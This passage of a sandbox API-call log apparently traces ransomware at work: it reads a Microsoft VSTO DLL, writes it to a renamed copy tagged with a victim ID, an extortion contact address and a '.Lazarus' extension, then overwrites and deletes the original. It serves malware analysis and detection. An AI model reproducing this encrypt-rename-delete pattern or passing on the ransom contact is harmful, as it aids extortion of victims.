lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0103.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8cb90 [0103.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8cb90, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 79 [0103.805] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.806] GetFileType (hFile=0x33c) returned 0x1 [0103.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0103.806] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0103.806] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0103.806] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0103.806] CloseHandle (hObject=0x33c) returned 1 [0103.806] AreFileApisANSI () returned 1 [0103.806] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0103.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8d370 [0103.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8d370, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 79 [0103.807] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.807] GetFileType (hFile=0x33c) returned 0x1 [0103.807] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0103.925] CloseHandle (hObject=0x33c) returned 1 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0103.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0103.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0103.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0103.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0103.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0103.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0103.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0103.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0103.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0103.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0103.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.927] AreFileApisANSI () returned 1 [0103.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0103.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c848 [0103.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8c848, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 79 [0103.927] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x5080)) returned 1 [0103.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0103.927] AreFileApisANSI () returned 1 [0103.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0103.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.927] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0103.927] GetLastError () returned 0x0 [0103.928] SetLastError (dwErrCode=0x0) [0103.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df18 [0103.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x986d0 [0103.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c058 [0103.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0103.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0103.928] GetLastError () returned 0x0 [0103.928] SetLastError (dwErrCode=0x0) [0103.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0103.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8aeb0 [0103.928] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0103.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0103.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0103.928] AreFileApisANSI () returned 1 [0103.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8aeb0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0103.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x11a) returned 0x5e870 [0103.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8aeb0, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=141 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 141 [0103.928] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.929] GetFileType (hFile=0x33c) returned 0x1 [0103.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0103.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0103.929] AreFileApisANSI () returned 1 [0103.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0103.929] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8ce30 [0103.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8ce30, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 79 [0103.929] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.929] GetFileType (hFile=0x368) returned 0x1 [0103.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0103.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0103.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0103.930] SetLastError (dwErrCode=0x0) [0103.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0103.930] SetLastError (dwErrCode=0x0) [0103.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0103.930] ReadFile (in: hFile=0x368, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0103.931] SetLastError (dwErrCode=0x0) [0103.931] GetLastError () returned 0x0 [0103.931] SetLastError (dwErrCode=0x0) [0103.931] GetLastError () returned 0x0 [0103.932] SetLastError (dwErrCode=0x0) [0103.932] GetLastError () returned 0x0 [0103.932] SetLastError (dwErrCode=0x0) [0103.932] ReadFile (in: hFile=0x368, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.933] WriteFile (in: hFile=0x33c, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.934] GetLastError () returned 0x0 [0103.934] SetLastError (dwErrCode=0x0) [0103.934] GetLastError () returned 0x0 [0103.934] SetLastError (dwErrCode=0x0) [0103.934] GetLastError () returned 0x0 [0103.934] SetLastError (dwErrCode=0x0) [0103.934] GetLastError () returned 0x0 [0103.934] SetLastError (dwErrCode=0x0) [0103.934] ReadFile (in: hFile=0x368, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.934] WriteFile (in: hFile=0x33c, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.935] GetLastError () returned 0x0 [0103.935] SetLastError (dwErrCode=0x0) [0103.935] GetLastError () returned 0x0 [0103.935] SetLastError (dwErrCode=0x0) [0103.935] GetLastError () returned 0x0 [0103.935] SetLastError (dwErrCode=0x0) [0103.935] GetLastError () returned 0x0 [0103.935] SetLastError (dwErrCode=0x0) [0103.935] ReadFile (in: hFile=0x368, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.935] WriteFile (in: hFile=0x33c, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.936] GetLastError () returned 0x0 [0103.936] SetLastError (dwErrCode=0x0) [0103.936] GetLastError () returned 0x0 [0103.936] SetLastError (dwErrCode=0x0) [0103.936] GetLastError () returned 0x0 [0103.936] SetLastError (dwErrCode=0x0) [0103.936] GetLastError () returned 0x0 [0103.936] SetLastError (dwErrCode=0x0) [0103.936] ReadFile (in: hFile=0x368, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.936] WriteFile (in: hFile=0x33c, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.936] GetLastError () returned 0x0 [0103.936] SetLastError (dwErrCode=0x0) [0103.937] GetLastError () returned 0x0 [0103.937] SetLastError (dwErrCode=0x0) [0103.937] GetLastError () returned 0x0 [0103.937] SetLastError (dwErrCode=0x0) [0103.937] GetLastError () returned 0x0 [0103.937] SetLastError (dwErrCode=0x0) [0103.937] ReadFile (in: hFile=0x368, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x327f0c4*=0x80, lpOverlapped=0x0) returned 1 [0103.937] ReadFile (in: hFile=0x368, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0103.937] WriteFile (in: hFile=0x33c, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.937] GetLastError () returned 0x0 [0103.937] SetLastError (dwErrCode=0x0) [0103.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0103.938] WriteFile (in: hFile=0x33c, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0x80, lpOverlapped=0x0) returned 1 [0103.938] GetLastError () returned 0x0 [0103.938] SetLastError (dwErrCode=0x0) [0103.938] GetLastError () returned 0x0 [0103.938] SetLastError (dwErrCode=0x0) [0103.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0103.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0103.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0103.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0103.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0103.938] CloseHandle (hObject=0x33c) returned 1 [0103.939] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x998e8 | out: hHeap=0x20000) returned 1 [0103.939] CloseHandle (hObject=0x368) returned 1 [0103.939] AreFileApisANSI () returned 1 [0103.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0103.939] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.940] GetFileType (hFile=0x368) returned 0x1 [0103.940] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0103.940] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x998e8 [0103.940] GetLastError () returned 0xb7 [0103.940] SetLastError (dwErrCode=0xb7) [0103.940] WriteFile (in: hFile=0x368, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0103.941] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x998e8 | out: hHeap=0x20000) returned 1 [0103.941] CloseHandle (hObject=0x368) returned 1 [0103.941] AreFileApisANSI () returned 1 [0103.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0103.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c458 [0103.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d160, cbMultiByte=-1, lpWideCharStr=0x8c458, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 79 [0103.942] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll")) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c058 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0103.943] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0103.943] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.943] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.943] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x583, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="ˠ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧茐\x07̧비聐葐\x08賂̧")) returned 0 [0103.943] FindClose (in: hFindFile=0x78310 | out: hFindFile=0x78310) returned 1 [0103.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0103.943] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0103.944] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0103.944] 